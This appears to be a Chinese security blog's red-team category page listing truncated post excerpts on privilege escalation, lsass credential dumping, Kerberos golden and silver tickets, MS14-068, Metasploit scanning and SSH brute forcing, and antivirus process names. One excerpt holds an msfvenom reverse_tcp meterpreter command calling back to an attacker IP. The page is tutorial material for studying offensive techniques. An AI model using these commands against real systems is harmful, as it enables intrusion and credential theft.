论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

随笔分类 -  红队

上一页 1 2 3 4 5

红队技术
一批内网文章分享
摘要:预览: 链接: https://www.lanzous.com/iaxp8ij 阅读全文
posted @ 2020-04-02 23:34 Yangsir34 阅读(260) 评论(0) 推荐(0)

关于windows组策略首选项提权
摘要:sysvol是活动目录的一个用于存储公共文件服务器副本的共享文件夹,在域中的所有域控之间进行复制。sysvol文件夹是在安装活动目录时候自动创建的,主要用来存放登录脚本、组策略数据及其他域控需要的域信息。sysvol在所有经过身份验证的域用户或者域信任用户具有读权限的活动目录的域范围内共享。整个sy 阅读全文
posted @ 2020-03-14 15:08 Yangsir34 阅读(1029) 评论(0) 推荐(0)

关于代替Procdump dump lsass的两种方法
摘要:如果目标系统上安装了sql server ,SqlDumper.exe默认存放c:\ProgramFiles\Microsoft SQL Server\number\Shared,number对应sqlserver版本140 for SQL Server 2017130 for SQL Server 阅读全文
posted @ 2020-03-10 12:05 Yangsir34 阅读(1805) 评论(0) 推荐(0)

windows提权备忘录
摘要:#Security Bulletin #KB #Description #Operating System CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/200 阅读全文
posted @ 2020-03-01 19:46 Yangsir34 阅读(201) 评论(0) 推荐(0)

linux提权备忘录
摘要:#CVE #Description #Kernels CVE-2017-1000367 [Sudo](Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494 [Samba Remote execution](Samba 3.5.0-4.6.4/4.5.10/4.4.14) CVE- 阅读全文
posted @ 2020-03-01 19:37 Yangsir34 阅读(305) 评论(0) 推荐(0)

票据传递之白银票据
摘要:黄金票据是伪造 TGT,白银票据(Silver Ticket)是伪造 ST(Service Ticket),因为它不想黄金票据一样使用krgtgt账户的hash,而是使用计算机账户的hash进行加密的,所以只能获访问指定的权限。前提条件:域名称、域SID、域服务账户的hash、伪造的用户名(任意用户 阅读全文
posted @ 2020-02-27 23:27 Yangsir34 阅读(452) 评论(0) 推荐(0)

票据传递之黄金票据
摘要:黄金票据(Golden Ticket)是有效的 TGT(TicketGranting Ticket)票据,是由 kerberos账户(krbtgt)加密的。然而krbtgt仅在域控上才用,意味着你已经拿到了域控,用于域控权限掉后,想再重新获取。因为域控的密码可能更改, 通常 kbrtgt 账户不会有 阅读全文
posted @ 2020-02-26 21:48 Yangsir34 阅读(802) 评论(0) 推荐(0)

票据传递之MS14-068
摘要:MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得 阅读全文
posted @ 2020-02-23 14:36 Yangsir34 阅读(503) 评论(0) 推荐(0)

MSF生成被控端并上线
摘要:被控端生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线:msf5 > use exploit/mul 阅读全文
posted @ 2020-02-23 13:05 Yangsir34 阅读(1741) 评论(0) 推荐(0)

msfvenom生成木马报错
摘要:报错如下: [*] Bundler failed to load and returned this error: 'cannot load such file -- bundler/setup'[*] You may need to uninstall or upgrade bundler 解决如 阅读全文
posted @ 2020-02-23 12:56 Yangsir34 阅读(597) 评论(0) 推荐(0)

MSF内网探测
摘要:整理不易,转载请加原文链接:https://www.cnblogs.com/Yang34/p/12343672.html 补充下msf与数据库连接 结合nmap如下: 发现内网服务 use auxiliary/scanner/http/http_version 发现http服务 use auxili 阅读全文
posted @ 2020-02-21 23:17 Yangsir34 阅读(643) 评论(0) 推荐(0)

杀软进程大全
摘要:更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。 "360tray.exe": "360安全卫士-实时保护", "360safe.exe": "360安全卫士-主程序", "ZhuDongFangYu.exe": "360安全卫士-主动防御", "360sd.exe": "360杀毒", 阅读全文
posted @ 2019-12-06 11:03 Yangsir34 阅读(840) 评论(0) 推荐(0)

常用端口 简洁版
摘要:常见的默认端口 1、web类(web漏洞/敏感目录) 第三方通用组件漏洞: struts thinkphp jboss ganglia zabbix ... 80 web 80-89 web 8000-9090 web 2、数据库类(扫描弱口令) 1433 MSSQL 1521 Oracle 330 阅读全文
posted @ 2019-10-17 14:31 Yangsir34 阅读(379) 评论(0) 推荐(0)

kalilinux MSF数据库的连接
摘要:需要自动连接数据库。如下设置。 阅读全文
posted @ 2019-08-25 11:16 Yangsir34 阅读(729) 评论(0) 推荐(0)

msf爆破
摘要:SSH服务口令猜解: msf > use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(ssh_login) > show optionsmsf auxiliary(ssh_login) > set RHOSTS 192.168.1.1msf auxili 阅读全文
posted @ 2019-08-25 11:14 Yangsir34 阅读(792) 评论(0) 推荐(0)

上一页 1 2 3 4 5